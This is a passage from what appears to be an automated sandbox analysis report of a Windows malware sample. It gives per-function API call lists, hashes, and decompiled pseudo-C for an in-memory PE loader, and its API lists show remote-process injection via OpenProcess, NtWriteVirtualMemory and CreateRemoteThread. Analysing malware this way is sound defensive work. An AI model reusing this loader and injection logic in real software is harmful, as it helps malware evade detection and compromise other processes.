                      • Instruction Fuzzy Hash: CA219672D40129BFDB219FF9DC48DAFBF75EB08254B114936EA15E2238D7B18D058B90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,00000001,00000000,000000B7,00000001,?,00000000,?,?,01417614), ref: 0141427A
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • RegEnumKeyExA.KERNEL32(00000000,?,00000000,01417614,00000000,00000000,00000000,00000000,00000104,00000000,?,01417614), ref: 014142C1
                      • WaitForSingleObject.KERNEL32(00000000,?), ref: 0141432E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 01412EC0: StrChrA.SHLWAPI(01414321,0000005F), ref: 01412F03
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,01414321), ref: 01412F1B
                        • Part of subcall function 01412EC0: RegOpenKeyA.ADVAPI32(?,?,?), ref: 01412F51
                        • Part of subcall function 01412EC0: RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412F77
                        • Part of subcall function 01412EC0: lstrlenW.KERNEL32 ref: 01412F88
                        • Part of subcall function 01412EC0: RtlAllocateHeap.NTDLL(00000000,01414357), ref: 01412F9D
                        • Part of subcall function 01412EC0: RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412FC2
                        • Part of subcall function 01412EC0: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FE8
                        • Part of subcall function 01412EC0: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FFA
                        • Part of subcall function 01412EC0: lstrcmpiW.KERNEL32(00000000), ref: 01413011
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,014180FA), ref: 01413053
                        • Part of subcall function 01412EC0: lstrcpy.KERNEL32(?,?), ref: 014130AC
                        • Part of subcall function 01412EC0: RegCreateKeyA.ADVAPI32(?,?,?), ref: 014130C0
                        • Part of subcall function 01412EC0: RegQueryValueExA.KERNEL32(?,01418256,00000000,?,?,01414321), ref: 014130E3
                        • Part of subcall function 01412EC0: RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 01413146
                        • Part of subcall function 01412EC0: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01413161
                        • Part of subcall function 01412EC0: RegDeleteValueW.ADVAPI32(?,014176D0), ref: 0141316F
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 01413178
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 01413181
                        • Part of subcall function 01412EC0: HeapFree.KERNEL32(00000000,01414321,?), ref: 01413196
                        • Part of subcall function 01412EC0: HeapFree.KERNEL32(00000000,00000000), ref: 014131B9
                        • Part of subcall function 01412EC0: RegCloseKey.ADVAPI32(?), ref: 014131CB
                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,01417614), ref: 01414356
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Heap$CloseOpenValue$CreateFreeQuerylstrcpy$AllocateDirectory$DeleteEnumObjectSingleWaitlstrcmpilstrlen
                      • String ID:
                      • API String ID: 3883769817-0
                      • Opcode ID: 13782e24ac49036d91750406ee89a51d2c86c3ca526de11de78e8c9342735dbe
                      • Instruction ID: b019c1c543a7228cdedd504c8225294246f5fa611400b32c9f7f8eabef588b17
                      • Opcode Fuzzy Hash: 13782e24ac49036d91750406ee89a51d2c86c3ca526de11de78e8c9342735dbe
                      • Instruction Fuzzy Hash: 66314C75E00119ABCF22AFA9CC448EFFFB9EB58750F15452AE515B3268D3704A91CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 01413B94: GetModuleFileNameW.KERNEL32(01417614,00000000,00000104,00000208,0141618C,0000000C,?,?,01412A29,?,00000001,0141618C,0000000C,00000000), ref: 01413BBA
                        • Part of subcall function 01413B94: GetModuleFileNameA.KERNEL32(01417614,00000000,00000104,00000208,0141618C,0000000C,?,?,01412A29,?,00000001,0141618C,0000000C,00000000), ref: 01413BC2
                        • Part of subcall function 01413B94: GetLastError.KERNEL32(?,?,01412A29,?,00000001,0141618C,0000000C,00000000,?,?,?,01411746), ref: 01413C00
                        • Part of subcall function 014147D2: lstrcmp.KERNEL32(?,01417614), ref: 01414882
                        • Part of subcall function 014147D2: lstrlen.KERNEL32(?,00000000,00000000,014117CE), ref: 0141488D
                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014132C4
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01411B26,01418451), ref: 014132D6
                      • ReadFile.KERNELBASE(?,?,00000004,?,00000000), ref: 014132EE
                      • CloseHandle.KERNEL32(?), ref: 01413309
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$ModuleName$CloseCreateErrorFreeHandleHeapLastPointerReadlstrcmplstrlen
                      • String ID:
                      • API String ID: 846255529-0
                      • Opcode ID: 2dfebe20150aac1fcf0bc552c3a3b58a5bc2bf42db84b4dae2248feed20abfd6
                      • Instruction ID: c72eb72652e0b4f430f31c0f305d274d8c9bcbf0c5d705bb7231b64d1feb20d7
                      • Opcode Fuzzy Hash: 2dfebe20150aac1fcf0bc552c3a3b58a5bc2bf42db84b4dae2248feed20abfd6
                      • Instruction Fuzzy Hash: F3118171A01118BBDB219F6ACD48EEFBE6DEF51670F104026F605E1279D7708A10C7A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			_entry_() {
                      				void* _t2;
                      				long _t3;
                      				long _t4;
                      
                      				_t4 = GetModuleHandleA(0); // executed
                      				_t2 = HeapCreate(0, 0x10000, 0); // executed
                      				if(_t2 == 0) {
                      					_t3 = GetLastError();
                      				} else {
                      					_t3 = E00401649(_t2, _t4); // executed
                      				}
                      				ExitThread(_t3);
                      			}

                      APIs
                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
                      • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
                      • GetLastError.KERNEL32 ref: 00401026
                      • ExitThread.KERNEL32 ref: 0040102D
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,00401034,?,00000000,?), ref: 0040167E
                        • Part of subcall function 00401649: CreateThread.KERNELBASE(00000000,00000000,004010FB,?,00000000,?), ref: 0040169C
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016B3
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016C0
                        • Part of subcall function 00401649: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016D0
                        • Part of subcall function 00401649: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016D9
                        • Part of subcall function 00401649: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016F7
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401700
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                        • Part of subcall function 00401649: CloseHandle.KERNEL32(?), ref: 00401714
                        • Part of subcall function 00401649: GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
• Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
• Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Thread$CreateErrorExitHandleLast$CloseCodeObjectSingleWait$HeapModuleTerminate
                      • String ID:
                      • API String ID: 1018212157-0
                      • Opcode ID: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction ID: d49e082437a9ef023ccd0a11086753c1fee01878f1312c092d0fc4a9b36bd46a
                      • Opcode Fuzzy Hash: 2d07d5a0eb97ff0e7f2ca181030923815197595ddaad25644c682c495b87b4cd
                      • Instruction Fuzzy Hash: E2D0C735640310A7F6212BB15F4DB4B3918AF04789F144531F745F50E0CAF94440C66D
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: b045e46c02a179eb745e3c3d3a12724a959805edea901451e028913547b6c025
                      • Instruction ID: aaeb3b41bccad396f4c5fb79abdf55d3d264e0308aeb663e7c3ad225a4184838
                      • Opcode Fuzzy Hash: b045e46c02a179eb745e3c3d3a12724a959805edea901451e028913547b6c025
                      • Instruction Fuzzy Hash: B461ABB4D047189FCB14DF99C880A9DFBF1BF88300F21895AE958AB355D774A985CF81
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • RtlUpcaseUnicodeString.NTDLL(?,0141764C,00000001), ref: 014114E6
                        • Part of subcall function 0141139A: memset.NTDLL ref: 014113BA
                        • Part of subcall function 0141139A: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 014113F9
                        • Part of subcall function 0141139A: GetLastError.KERNEL32 ref: 01411429
                        • Part of subcall function 0141139A: HeapFree.KERNEL32(00000000,?), ref: 0141143B
                        • Part of subcall function 014123B4: OpenProcess.KERNEL32(001F0FFF,00000000,0141155F,0141155F,C000009A,01417614,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 014123DF
                        • Part of subcall function 014123B4: CreateRemoteThread.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,0141155F,?,00000000,?,01417614), ref: 01412439
                        • Part of subcall function 014123B4: CloseHandle.KERNEL32(0141155F), ref: 01412453
                        • Part of subcall function 014123B4: GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 0141245B
                        • Part of subcall function 014123B4: CloseHandle.KERNEL32(?), ref: 0141246D
                        • Part of subcall function 014123B4: GetLastError.KERNEL32(?,?,0141155F,?,00000000,?,01417614), ref: 01412475
                      • RtlFreeAnsiString.NTDLL(?), ref: 01411564
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorLast$CloseCreateFreeHandleProcessString$AnsiHeapOpenRemoteThreadUnicodeUpcasememset
                      • String ID: pnls
                      • API String ID: 4173972397-141991303
                      • Opcode ID: b9ee881b4deb202c320435dcc4766fe245898743c79f9b115f5a301203b21884
                      • Instruction ID: 534cf80f2f25f82b1f9015735faf771b90f25f168f7c15e81ec5511e1fdd104c
                      • Opcode Fuzzy Hash: b9ee881b4deb202c320435dcc4766fe245898743c79f9b115f5a301203b21884
                      • Instruction Fuzzy Hash: AB11E7306102059BDB20DF3DD8449AB7BA9EF04A50F18851BEB53C367CE771E944C741
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 82%
                      			E00401495(void* __eax, void* _a4) {
                      				signed int _v8;
                      				signed int _v12;
                      				long _v16;
                      				signed int _v20;
                      				signed int _t31;
                      				long _t33;
                      				int _t34;
                      				signed int _t35;
                      				signed int _t42;
                      				void* _t50;
                      				void* _t51;
                      				signed int _t54;
                      
                      				_v12 = _v12 & 0x00000000; // 0x0040149f
                      				_t42 =  *(__eax + 6) & 0x0000ffff; // 0x004014a4
                      				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18; // 0x004014b0
                      				_v20 = _t42; // 0x004014bd
                      				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed; 0x004014c3
                      				_v8 = _v8 & 0x00000000; // 0x004014c5
                      				if(_t42 <= 0) { // 0x004014cb
                      					L11: // 0x00401538
                      					return _v12; // 0x0040153f
                      				} // 0x0040153f
                      				_t51 = _t50 + 0x24; // 0x004014cd
                      				while(1) { // 0x004014d0
                      					_t54 = _v12; // 0x004014d0
                      					if(_t54 != 0) { // 0x004014d4
                      						goto L11; // 0x00000000
                      					} // 0x00000000
                      					asm("bt dword [esi], 0x1d"); // 0x004014d6
                      					if(_t54 >= 0) { // 0x004014da
                      						asm("bt dword [esi], 0x1e"); // 0x004014f2
                      						if(__eflags >= 0) { // 0x004014f6
                      							_t33 = 4; // 0x0040150a
                      						} else { // 0x004014f8
                      							asm("bt dword [esi], 0x1f"); // 0x004014f8
                      							_t35 = 0; // 0x004014fe
                      							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2; // 0x00401502
                      						} // 0x00401502
                      					} else { // 0x004014dc
                      						asm("bt dword [esi], 0x1f"); // 0x004014dc
                      						asm("sbb eax, eax"); // 0x004014e8
                      						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20; // 0x004014ed
                      					} // 0x004014ed
                      					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed; 0x0040151b
                      					if(_t34 == 0) { // 0x0040151f
                      						_v12 = GetLastError(); // 0x00401527
                      					} // 0x00401527
                      					_t51 = _t51 + 0x28; // 0x0040152a
                      					_v8 = _v8 + 1; // 0x0040152d
                      					_t31 = _v8; // 0x00401530
                      					if(_t31 < _v20) { // 0x00401536
                      						continue; // 0x00000000
                      					} else { // 0x00000000
                      						goto L11; // 0x00000000
                      					} // 0x00000000
                      				} // 0x00401536
                      				goto L11; // 0x00000000
                      			}

                      APIs
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                      • VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                      • GetLastError.KERNEL32 ref: 00401521
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual$ErrorLast
                      • String ID:
                      • API String ID: 1469625949-0
                      • Opcode ID: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction ID: 09eb7866679b6c449c64175da2a2ea58a88de491138e230cfb810df5d0af35aa
                      • Opcode Fuzzy Hash: 95d2213623497587fae5e7dbb29a83bab2f11f1efb818d08303951515af05ee9
                      • Instruction Fuzzy Hash: 6E21C672900209EFEB208F94CC80FBEB7B4FB50355F10446AE541AB1A1D3749A85DB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • OpenProcess.KERNEL32(00000400,00000000,01417614,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141323E
                      • IsWow64Process.KERNELBASE(01417624,?,0141618C,0000000C,?,?,01411718,00000000,?,01417614), ref: 0141324F
                      • CloseHandle.KERNEL32(01417624), ref: 01413262
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Process$CloseHandleOpenWow64
                      • String ID:
                      • API String ID: 10462204-0
                      • Opcode ID: 2ff2ea147ee6e79f28ba4adb59f63fe5299a8e25c07d7206360c4d728937242a
                      • Instruction ID: 2065391e23837db4299b860535537d29f5d211ea97b94411c1b16cef8870f87e
                      • Opcode Fuzzy Hash: 2ff2ea147ee6e79f28ba4adb59f63fe5299a8e25c07d7206360c4d728937242a
                      • Instruction Fuzzy Hash: 56F05EB1900114FB9B21EF59C8088DFBEBCFF856A1B118126FE09A3218E2719A01D7A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction ID: 7278c62771519817fda3e430b20af58aab95186353d54bae1be77a916756204c
                      • Opcode Fuzzy Hash: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction Fuzzy Hash: 4B417AB5E002288FDB64CF68C980B89FBF1BF89314F16859AD959A7311D770AE85CF41
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 01414161: HeapFree.KERNEL32(00000000,0141618C,0141618C), ref: 014141B7
                        • Part of subcall function 01414631: lstrlen.KERNEL32(0141618C,00000000,?,00000027,0141618C,00000000,00000000,0141822E,00000000,?,0141618C,00000000,00000000), ref: 01414667
                        • Part of subcall function 01414631: lstrcpy.KERNEL32(00000000,00000000), ref: 0141468B
                        • Part of subcall function 01414631: lstrcat.KERNEL32(00000000,00000000), ref: 01414693
                      • HeapFree.KERNEL32(00000000,?,Local\), ref: 0141121A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FreeHeap$lstrcatlstrcpylstrlen
                      • String ID: Local\
                      • API String ID: 2271934720-422136742
                      • Opcode ID: 6e2f13c37659814026ad25b8a8a650051358d560865bce752cfe06e82363532e
                      • Instruction ID: d8e8d9c9b376cac89bc4600940396e64921e75bb8104ef77b4f32349c98e01ac
                      • Opcode Fuzzy Hash: 6e2f13c37659814026ad25b8a8a650051358d560865bce752cfe06e82363532e
                      • Instruction Fuzzy Hash: D211737590024AEBDB20DB6AED01BDE7BB8EB90741F10446B9904E6168EB34D601CB14
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetModuleHandleA.KERNEL32(014180DB,?,CCCCFEEB,01411E0D,?,?,?,00000000), ref: 01411B10
                        • Part of subcall function 01413271: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014132C4
                        • Part of subcall function 01413271: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01411B26,01418451), ref: 014132D6
                        • Part of subcall function 01413271: ReadFile.KERNELBASE(?,?,00000004,?,00000000), ref: 014132EE
                        • Part of subcall function 01413271: CloseHandle.KERNEL32(?), ref: 01413309
                      • memcpy.NTDLL(?,014175E0,00000018,0141845C,01418400,01418451), ref: 01411B7B
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Handle$CloseCreateModulePointerReadmemcpy
                      • String ID:
                      • API String ID: 3176338324-0
                      • Opcode ID: 92f2bdce608aef5e2c45e3ee945bece5684b6be90141b169fce7d67ae3f72559
                      • Instruction ID: b13f0ce52fb272248fc08d0244d26c76686742e29c867d024f0205ee417200a8
                      • Opcode Fuzzy Hash: 92f2bdce608aef5e2c45e3ee945bece5684b6be90141b169fce7d67ae3f72559
                      • Instruction Fuzzy Hash: 23015E757916825BD730EF2AE802D467FA1B7A0A12719452BE208D263CFA30E5018BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000,0141244E), ref: 014119BC
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E), ref: 014119F0
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Virtual$ErrorProtect$LastMemoryStatusWrite
                      • String ID:
                      • API String ID: 1675666816-0
                      • Opcode ID: 79f88a124a0b69b190a03fa5f34c235a6966a857f89ecb5216a90b1f742dbf1b
                      • Instruction ID: ecec4cd03bc2aa4ea0edf11cef80cd4a802e67899d133f1d168b13b72becba43
                      • Opcode Fuzzy Hash: 79f88a124a0b69b190a03fa5f34c235a6966a857f89ecb5216a90b1f742dbf1b
                      • Instruction Fuzzy Hash: A4F0FFB661010DBFEF129FD5CC41EEE7F6DEB04654F004066BB15A5060D271DA11DB54
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			E004011F2(long _a4) {
                      				void* _t2;
                      
                      				_t2 = RtlAllocateHeap( *0x40305c, 0, _a4); // executed; 0x004011fe
                      				return _t2; // 0x00401204
                      			}

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction ID: 4425f1c6487cb1303e53a5fb1f876b1ba006c7dfd0de678c3456b649a32eedb4
                      • Opcode Fuzzy Hash: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction Fuzzy Hash: AEB01231000300EBDB019F00EF08F077F75A750701F10C030B304600B482714420EB1C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148913877.00380000.00000040.sdmp, Offset: 00380000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_380000_text.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction ID: d0762d2e58834a41e72361be26aa89d13a774037de60630951f7beac8d39ebe3
                      • Opcode Fuzzy Hash: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction Fuzzy Hash: 8F41E2B0A052199FDB44DFA9C5806AEFBF0FF88310F61846EE848AB301D375A941CF91
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			E004015A3(intOrPtr* __ebx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				char _v20;
                      				void* __edi;
                      				void* _t24;
                      				signed int _t26;
                      				signed int _t27;
                      				signed int _t29;
                      				intOrPtr _t30;
                      				char* _t31;
                      				void* _t32;
                      				void* _t36;
                      				void* _t41;
                      
                      				_t20 =  *((intOrPtr*)(__ebx + 4)); // 0x004015a6
                      				_t24 = VirtualAlloc(0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 4)) + 0x3c)) + _t20 + 0x50)) + 0x00000fff & 0xfffff000, 0x1000, 4); // executed; 0x004015c9
                      				_t36 = _t24; // 0x004015cf
                      				if(_t36 == 0) { // 0x004015d3
                      					_v8 = 8; // 0x0040163b
                      				} else { // 0x004015d5
                      					_t26 = E0040121C(_t36,  *((intOrPtr*)(__ebx + 4))); // 0x004015d9
                      					_v8 = _t26; // 0x004015de
                      					if(_t26 == 0) { // 0x004015e3
                      						_t41 =  *((intOrPtr*)(_t36 + 0x3c)) + _t36; // 0x004015e8
                      						_t27 = E00401398(_t36, _t41); // 0x004015eb
                      						_v8 = _t27; // 0x004015f0
                      						if(_t27 == 0) { // 0x004015f5
                      							_t29 = E00401495(_t41, _t36); // executed; 0x004015fa
                      							_v8 = _t29; // 0x004015ff
                      							if(_t29 == 0) { // 0x00401604
                      								_t30 = E00401542( *((intOrPtr*)(__ebx))); // 0x00401608
                      								_v12 = _t30; // 0x0040160d
                      								if(_t30 == 0) { // 0x00401612
                      									_t31 = 0; // 0x00401624
                      								} else { // 0x00401614
                      									_v16 = _v16 & 0x00000000; // 0x00401614
                      									_v20 = 0xf1c0def0; // 0x00401618
                      									_t31 =  &_v20; // 0x0040161f
                      								} // 0x0040161f
                      								_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x28)) + _t36))(_t36, 1, _t31); // executed; 0x0040162f
                      								if(_t32 != 0) { // 0x00401633
                      									_v8 = _v8 & 0x00000000; // 0x00401635
                      								} // 0x00401635
                      							} // 0x00401633
                      						} // 0x00401604
                      					} // 0x004015f5
                      				} // 0x004015e3
                      				return _v8; // 0x00401648
                      			}

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?,00000000,752AC470,?,?,?,?,004015DE,00000000,?,?,?,00000000), ref: 0040125C
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?), ref: 0040129A
                        • Part of subcall function 00401398: LoadLibraryA.KERNEL32(?), ref: 004013C5
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                        • Part of subcall function 00401398: memset.NTDLL ref: 004013E2
                        • Part of subcall function 00401398: GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                        • Part of subcall function 00401398: memset.NTDLL ref: 0040144A
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                        • Part of subcall function 00401495: GetLastError.KERNEL32 ref: 00401521
                        • Part of subcall function 00401542: GetModuleFileNameW.KERNEL32(?,00000000,00000104,?,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 00401560
                      Memory Dump Source
                      • Source File: 00000003.00000002.1148966230.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.1148947137.00400000.00000002.sdmp
                      • Associated: 00000003.00000002.1148981734.00402000.00000002.sdmp
                      • Associated: 00000003.00000002.1149005296.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_text.jbxd
                      Similarity
                      • API ID: Virtual$Protectlstrlenmemcpymemset$AddressAllocErrorFileLastLibraryLoadModuleNameProc
                      • String ID:
                      • API String ID: 3816444689-0
                      • Opcode ID: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction ID: 93de27251ef7a5c3cddc38c0c27dc13e4c4a5a163c12a8e24408c513e8fcc30f
                      • Opcode Fuzzy Hash: c481fc0c6816d887f64394c5b75e79c69b5566eca14fe893ad366164f62a3b16
                      • Instruction Fuzzy Hash: A7118E71900616EBDB119B69CD14BAF7BB8AF50704F1844BAE800FB2E1EB79DD018B58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 01413ECF: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01413F6D
                        • Part of subcall function 01413ECF: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01413F81
